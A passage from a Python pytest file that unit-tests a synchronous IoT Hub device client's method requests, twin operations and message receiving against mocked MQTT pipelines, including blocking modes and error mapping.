assert sent_message.data == data_input
class SharedClientReceiveMethodRequestTests(object):
@pytest.mark.it("Implicitly enables methods feature if not already enabled")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_enables_methods_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, method_name
):
mocker.patch.object(SyncClientInbox, "get") # patch this receive_method_request won't block
# Verify Input Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # Method Requests will appear disabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.METHODS
mqtt_pipeline.enable_feature.reset_mock()
# Verify Input Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
True
) # Input Messages will appear enabled
client.receive_method_request(method_name)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it(
"Returns a MethodRequest from the generic method inbox, if available, when called without method name"
)
def test_called_without_method_name_returns_method_request_from_generic_method_inbox(
self, mocker, client
):
request = MethodRequest(request_id="1", name="some_method", payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request()
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(None)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it(
"Returns MethodRequest from the corresponding method inbox, if available, when called with a method name"
)
def test_called_with_method_name_returns_method_request_from_named_method_inbox(
self, mocker, client
):
method_name = "some_method"
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = request
manager_get_inbox_mock = mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
received_request = client.receive_method_request(method_name)
assert manager_get_inbox_mock.call_count == 1
assert manager_get_inbox_mock.call_args == mocker.call(method_name)
assert inbox_mock.get.call_count == 1
assert received_request is received_request
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_method_request_can_be_called_in_mode(
self, mocker, client, block, timeout, method_name
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_receive_method_request_default_mode(self, mocker, client, method_name):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
target=client._inbox_manager,
attribute="get_method_request_inbox",
return_value=inbox_mock,
)
client.receive_method_request(method_name=method_name)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a method request is available, in blocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_method_request_in_inbox_blocking_mode(self, client, method_name):
request = MethodRequest(request_id="1", name=method_name, payload={"key": "value"})
inbox = client._inbox_manager.get_method_request_inbox(method_name)
assert inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
inbox._put(request)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_request = client.receive_method_request(method_name, block=True)
assert received_request is request
# This proves that the blocking happens because 'received_request' can't be
# 'request' until after a 10 millisecond delay on the insert. But because the
# 'received_request' IS 'request', it means that client.receive_method_request
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_times_out_waiting_for_message_blocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
def test_no_message_in_inbox_nonblocking_mode(self, client, method_name):
result = client.receive_method_request(method_name, block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, method_name, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
client._receive_type = RECEIVE_TYPE_API
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"method_name",
[pytest.param(None, id="Generic Method"), pytest.param("method_x", id="Named Method")],
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(
self, mocker, client, mqtt_pipeline, method_name, block, timeout
):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(
client._inbox_manager, "get_method_request_inbox", return_value=inbox_mock
)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_method_request(method_name=method_name, block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
class SharedClientSendMethodResponseTests(WaitsForEventCompletion):
@pytest.mark.it("Begins a 'send_method_response' pipeline operation")
def test_send_method_response_calls_pipeline(self, client, mqtt_pipeline, method_response):
client.send_method_response(method_response)
assert mqtt_pipeline.send_method_response.call_count == 1
assert mqtt_pipeline.send_method_response.call_args[0][0] is method_response
@pytest.mark.it(
"Waits for the completion of the 'send_method_response' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, method_response
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.send_method_response
)
client_manual_cb.send_method_response(method_response)
@pytest.mark.it(
"Raises a client error if the `send_method_response` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
method_response,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.send_method_response,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.send_method_response(method_response)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientGetTwinTests(WaitsForEventCompletion):
@pytest.fixture
def patch_get_twin_to_return_fake_twin(self, fake_twin, mocker, mqtt_pipeline):
def immediate_callback(callback):
callback(twin=fake_twin)
mocker.patch.object(mqtt_pipeline, "get_twin", side_effect=immediate_callback)
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, patch_get_twin_to_return_fake_twin, fake_twin
):
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.get_twin()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'get_twin' pipeline operation")
def test_get_twin_calls_pipeline(self, client, mqtt_pipeline):
client.get_twin()
assert mqtt_pipeline.get_twin.call_count == 1
@pytest.mark.it(
"Waits for the completion of the 'get_twin' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
client_manual_cb.get_twin()
@pytest.mark.it(
"Raises a client error if the `get_twin` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, pipeline_error, client_error
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.get_twin()
assert e_info.value.__cause__ is my_pipeline_error
@pytest.mark.it("Returns the twin that the pipeline returned")
def test_verifies_twin_returned(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, fake_twin
):
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.get_twin,
kwargs={"twin": fake_twin},
)
returned_twin = client_manual_cb.get_twin()
assert returned_twin == fake_twin
class SharedClientPatchTwinReportedPropertiesTests(WaitsForEventCompletion):
@pytest.mark.it("Implicitly enables twin messaging feature if not already enabled")
def test_enables_twin_only_if_not_already_enabled(
self, mocker, client, mqtt_pipeline, twin_patch_reported
):
# patch this so x_get_twin won't block
def immediate_callback(patch, callback):
callback()
mocker.patch.object(
mqtt_pipeline, "patch_twin_reported_properties", side_effect=immediate_callback
)
# Verify twin enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # twin will appear disabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # twin will appear enabled
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Begins a 'patch_twin_reported_properties' pipeline operation")
def test_patch_twin_reported_properties_calls_pipeline(
self, client, mqtt_pipeline, twin_patch_reported
):
client.patch_twin_reported_properties(twin_patch_reported)
assert mqtt_pipeline.patch_twin_reported_properties.call_count == 1
assert (
mqtt_pipeline.patch_twin_reported_properties.call_args[1]["patch"]
is twin_patch_reported
)
@pytest.mark.it(
"Waits for the completion of the 'patch_twin_reported_properties' pipeline operation before returning"
)
def test_waits_for_pipeline_op_completion(
self, mocker, client_manual_cb, mqtt_pipeline_manual_cb, twin_patch_reported
):
self.add_event_completion_checks(
mocker=mocker, pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties
)
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
@pytest.mark.it(
"Raises a client error if the `patch_twin_reported_properties` pipeline operation calls back with a pipeline error"
)
@pytest.mark.parametrize(
"pipeline_error,client_error",
[
pytest.param(
pipeline_exceptions.ConnectionDroppedError,
client_exceptions.ConnectionDroppedError,
id="ConnectionDroppedError->ConnectionDroppedError",
),
pytest.param(
pipeline_exceptions.ConnectionFailedError,
client_exceptions.ConnectionFailedError,
id="ConnectionFailedError->ConnectionFailedError",
),
pytest.param(
pipeline_exceptions.UnauthorizedError,
client_exceptions.CredentialError,
id="UnauthorizedError->CredentialError",
),
pytest.param(
pipeline_exceptions.ProtocolClientError,
client_exceptions.ClientError,
id="ProtocolClientError->ClientError",
),
pytest.param(Exception, client_exceptions.ClientError, id="Exception->ClientError"),
],
)
def test_raises_error_on_pipeline_op_error(
self,
mocker,
client_manual_cb,
mqtt_pipeline_manual_cb,
twin_patch_reported,
pipeline_error,
client_error,
):
my_pipeline_error = pipeline_error()
self.add_event_completion_checks(
mocker=mocker,
pipeline_function=mqtt_pipeline_manual_cb.patch_twin_reported_properties,
kwargs={"error": my_pipeline_error},
)
with pytest.raises(client_error) as e_info:
client_manual_cb.patch_twin_reported_properties(twin_patch_reported)
assert e_info.value.__cause__ is my_pipeline_error
class SharedClientReceiveTwinDesiredPropertiesPatchTests(object):
@pytest.mark.it(
"Implicitly enables Twin desired properties patch feature if not already enabled"
)
def test_enables_twin_patches_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(
SyncClientInbox, "get"
) # patch this so receive_twin_desired_properties_patch won't block
# Verify twin patches enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = (
False
) # twin patches will appear disabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.TWIN_PATCHES
mqtt_pipeline.enable_feature.reset_mock()
# Verify twin patches not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_twin_desired_properties_patch()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a patch from the twin patch inbox, if available")
def test_returns_message_from_twin_patch_inbox(self, mocker, client, twin_patch_desired):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = twin_patch_desired
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock
)
received_patch = client.receive_twin_desired_properties_patch()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_patch is twin_patch_desired
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client.receive_twin_desired_properties_patch()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a patch is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, twin_patch_desired):
twin_patch_inbox = client._inbox_manager.get_twin_patch_inbox()
assert twin_patch_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
twin_patch_inbox._put(twin_patch_desired)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_patch = client.receive_twin_desired_properties_patch(block=True)
assert received_patch is twin_patch_desired
# This proves that the blocking happens because 'received_patch' can't be
# 'twin_patch_desired' until after a 10 millisecond delay on the insert. But because the
# 'received_patch' IS 'twin_patch_desired', it means that client.receive_twin_desired_properties_patch
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no patches, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_twin_desired_properties_patch(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_twin_patch_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_twin_desired_properties_patch(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
################
# DEVICE TESTS #
################
class IoTHubDeviceClientTestsConfig(object):
@pytest.fixture
def client_class(self):
return IoTHubDeviceClient
@pytest.fixture
def client(self, mqtt_pipeline, http_pipeline):
"""This client automatically resolves callbacks sent to the pipeline.
It should be used for the majority of tests.
"""
return IoTHubDeviceClient(mqtt_pipeline, http_pipeline)
@pytest.fixture
def client_manual_cb(self, mqtt_pipeline_manual_cb, http_pipeline_manual_cb):
"""This client requires manual triggering of the callbacks sent to the pipeline.
It should only be used for tests where manual control fo a callback is required.
"""
return IoTHubDeviceClient(mqtt_pipeline_manual_cb, http_pipeline_manual_cb)
@pytest.fixture
def connection_string(self, device_connection_string):
"""This fixture is parametrized to provie all valid device connection strings.
See client_fixtures.py
"""
return device_connection_string
@pytest.fixture
def sas_token_string(self, device_sas_token_string):
return device_sas_token_string
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - Instantiation")
class TestIoTHubDeviceClientInstantiation(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientInstantiationTests
):
@pytest.mark.it("Sets on_c2d_message_received handler in the MQTTPipeline")
def test_sets_on_c2d_message_received_handler_in_pipeline(
self, client_class, mqtt_pipeline, http_pipeline
):
client = client_class(mqtt_pipeline, http_pipeline)
assert client._mqtt_pipeline.on_c2d_message_received is not None
assert (
client._mqtt_pipeline.on_c2d_message_received == client._inbox_manager.route_c2d_message
)
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_connection_string()")
class TestIoTHubDeviceClientCreateFromConnectionString(
IoTHubDeviceClientTestsConfig, SharedIoTHubClientCreateFromConnectionStringTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_symmetric_key()")
class TestIoTHubDeviceClientCreateFromSymmetricKey(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromSymmetricKeyTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .create_from_x509_certificate()")
class TestIoTHubDeviceClientCreateFromX509Certificate(
IoTHubDeviceClientTestsConfig, SharedIoTHubDeviceClientCreateFromX509CertificateTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .connect()")
class TestIoTHubDeviceClientConnect(IoTHubDeviceClientTestsConfig, SharedClientConnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .disconnect()")
class TestIoTHubDeviceClientDisconnect(IoTHubDeviceClientTestsConfig, SharedClientDisconnectTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_message()")
class TestIoTHubDeviceClientSendD2CMessage(
IoTHubDeviceClientTestsConfig, SharedClientSendD2CMessageTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_message()")
class TestIoTHubDeviceClientReceiveC2DMessage(IoTHubDeviceClientTestsConfig):
@pytest.mark.it("Implicitly enables C2D messaging feature if not already enabled")
def test_enables_c2d_messaging_only_if_not_already_enabled(self, mocker, client, mqtt_pipeline):
mocker.patch.object(SyncClientInbox, "get") # patch this so receive_message won't block
# Verify C2D Messaging enabled if not enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = False # C2D will appear disabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 1
assert mqtt_pipeline.enable_feature.call_args[0][0] == pipeline_constant.C2D_MSG
mqtt_pipeline.enable_feature.reset_mock()
# Verify C2D Messaging not enabled if already enabled
mqtt_pipeline.feature_enabled.__getitem__.return_value = True # C2D will appear enabled
client.receive_message()
assert mqtt_pipeline.enable_feature.call_count == 0
@pytest.mark.it("Returns a message from the C2D inbox, if available")
def test_returns_message_from_c2d_inbox(self, mocker, client, message):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
inbox_mock.get.return_value = message
manager_get_inbox_mock = mocker.patch.object(
client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock
)
received_message = client.receive_message()
assert manager_get_inbox_mock.call_count == 1
assert inbox_mock.get.call_count == 1
assert received_message is message
@pytest.mark.it("Can be called in various modes")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_can_be_called_in_mode(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message(block=block, timeout=timeout)
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=block, timeout=timeout)
@pytest.mark.it("Defaults to blocking mode with no timeout")
def test_default_mode(self, mocker, client):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client.receive_message()
assert inbox_mock.get.call_count == 1
assert inbox_mock.get.call_args == mocker.call(block=True, timeout=None)
@pytest.mark.it("Blocks until a message is available, in blocking mode")
def test_no_message_in_inbox_blocking_mode(self, client, message):
c2d_inbox = client._inbox_manager.get_c2d_message_inbox()
assert c2d_inbox.empty()
def insert_item_after_delay():
time.sleep(0.01)
c2d_inbox._put(message)
insertion_thread = threading.Thread(target=insert_item_after_delay)
insertion_thread.start()
received_message = client.receive_message(block=True)
assert received_message is message
# This proves that the blocking happens because 'received_message' can't be
# 'message' until after a 10 millisecond delay on the insert. But because the
# 'received_message' IS 'message', it means that client.receive_message
# did not return until after the delay.
@pytest.mark.it(
"Returns None after a timeout while blocking, in blocking mode with a specified timeout"
)
def test_times_out_waiting_for_message_blocking_mode(self, client):
result = client.receive_message(block=True, timeout=0.01)
assert result is None
@pytest.mark.it("Returns None immediately if there are no messages, in nonblocking mode")
def test_no_message_in_inbox_nonblocking_mode(self, client):
result = client.receive_message(block=False)
assert result is None
@pytest.mark.it("Locks the client to API Receive Mode if the receive mode has not yet been set")
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_not_set(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
assert client._receive_type is RECEIVE_TYPE_NONE_SET
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Does not modify the client receive mode if it has already been set to API Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_api(self, mocker, client, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
client._receive_type = RECEIVE_TYPE_API
client.receive_message(block=block, timeout=timeout)
assert client._receive_type is RECEIVE_TYPE_API
@pytest.mark.it(
"Raises a ClientError and does nothing else if the client receive mode has been set to Handler Receive Mode"
)
@pytest.mark.parametrize(
"block,timeout",
[
pytest.param(True, None, id="Blocking, no timeout"),
pytest.param(True, 10, id="Blocking with timeout"),
pytest.param(False, None, id="Nonblocking"),
],
)
def test_receive_mode_set_handler(self, mocker, client, mqtt_pipeline, block, timeout):
inbox_mock = mocker.MagicMock(autospec=SyncClientInbox)
mocker.patch.object(client._inbox_manager, "get_c2d_message_inbox", return_value=inbox_mock)
# patch this so we can make sure feature enabled isn't modified
mqtt_pipeline.feature_enabled.__getitem__.return_value = False
client._receive_type = RECEIVE_TYPE_HANDLER
# Error was raised
with pytest.raises(client_exceptions.ClientError):
client.receive_message(block=block, timeout=timeout)
# Feature was not enabled
assert mqtt_pipeline.enable_feature.call_count == 0
# Inbox get was not called
assert inbox_mock.get.call_count == 0
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_method_request()")
class TestIoTHubDeviceClientReceiveMethodRequest(
IoTHubDeviceClientTestsConfig, SharedClientReceiveMethodRequestTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .send_method_response()")
class TestIoTHubDeviceClientSendMethodResponse(
IoTHubDeviceClientTestsConfig, SharedClientSendMethodResponseTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .get_twin()")
class TestIoTHubDeviceClientGetTwin(IoTHubDeviceClientTestsConfig, SharedClientGetTwinTests):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .patch_twin_reported_properties()")
class TestIoTHubDeviceClientPatchTwinReportedProperties(
IoTHubDeviceClientTestsConfig, SharedClientPatchTwinReportedPropertiesTests
):
pass
@pytest.mark.describe("IoTHubDeviceClient (Synchronous) - .receive_twin_desired_properties_patch()")
class TestIoTHubDeviceClientReceiveTwinDesiredPropertiesPatch(
